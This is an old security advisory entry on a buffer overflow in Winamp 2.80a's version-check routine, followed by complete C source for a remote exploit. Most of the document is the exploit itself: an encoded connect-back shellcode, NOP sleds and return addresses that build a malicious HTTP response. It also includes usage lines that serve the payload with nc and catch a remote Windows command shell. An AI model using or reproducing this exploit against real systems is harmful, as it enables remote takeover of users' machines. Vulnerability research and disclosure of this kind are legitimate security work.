source: http://www.securityfocus.com/bid/5170/info Nullsoft Winamp is a media player for Microsoft Windows supporting MP3 and other filetypes. Winamp is vulnerable to a buffer overflow condition when checking for updated versions. A malicious server located at www.winamp.com may return a malicious response. Exploitation may result in the execution of arbitrary code as the Winamp process. It may be possible to exploit this vulnerability if an attacker can control the resolution of the www.winamp.com domain, possibly through DNS cache poisoning. /* wampexp.c July 3rd, 2002 Winamp 2.80a and all previous remote exploit (connect-back styles) winamp has an option, enabled by default, which checks for the latest version from www.winamp.com and will then notify the user of a possible upgrade via a messagebox.. unfortunately, if it were to receive a huge response via some nameserver corruption the thread parsing the response is thrown into an infinite loop and eventually the exception dispatcher is called.. and THEN like most of the time under windows a big, bad, overflow occurs.. ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80 # nc -l -p 5555 *poisoned user opens winamp* # nc -l -p 5555 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\> sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55 ([email protected]) yes, yahoo took away my 2! ;~~~ */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/errno.h> #include <unistd.h> // a minimal HTTP header and fake version unsigned char payload[35904] = "\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a"; // a gruesome hack of dark spyrits jill.c shell that further alters the // startupinfo structure (as this isn't a service) and calls ExitThread // to keep things invisible.. unsigned char shell[] = "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84" "\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20" "\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0"; main(char argc, char **argv){ int i; unsigned short int a_port; unsigned long a_host; struct hostent *ht; struct sockaddr_in sin; if (argc < 3){ printf("Winamp 2.80a remote exploit (7/3/2002)\n"); printf("[email protected]\n\n"); printf("usage: %s <localhost> <localport>\n\n", argv[0]); printf("NOTE: target os is 2000.. probably works on all\n"); printf("winamp versions prior to 2.80a as there are no \n"); printf("dependancies on winamp, only the static ws2help\n\n"); exit(-1); } // blatantly ripped! *TEEHEEEHHEH* a_port = htons(atoi(argv[2])); a_port ^= 0x9595; if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);} a_host = *((unsigned long *)ht->h_addr); a_host ^= 0x95959595; shell[385] = ((a_port) & 0xff); shell[386] = ((a_port >> 8) & 0xff); shell[390] = ((a_host) & 0xff); shell[391] = ((a_host >> 8) & 0xff); shell[392] = ((a_host >> 16) & 0xff); shell[393] = ((a_host >> 24) & 0xff); strcat(payload, shell); // lots of NOPs for(i=792;i<9704;i++) strcat(payload, "\x90"); // we land here when we jmp ebx the second time // this sets ebx to the start of our shell, and jmps back strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37"); strcat(payload, "\x11\x01\xff\xe3"); // lots more NOPs for lots more fun for(i=9718;i<35809;i++) strcat(payload, "\x90"); // and bh, dl; jmp ebx.. this allows us to jmp back into an area // where we can put some real code strcat(payload, "\x22\xfa\xff\xe3"); // our "eip" (call ecx; ntdll.dll@0x11936) // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs) strcat(payload, "\xd6\x19\x02\x75"); // if ws2help doesn't match for some reason, use this call ebx.. // dependant on the winamp in_wm.dll plugin //strcat(payload, "\x57\x22\x12\x01"); strcat(payload, "\x0d\x0a"); printf("%s", payload); }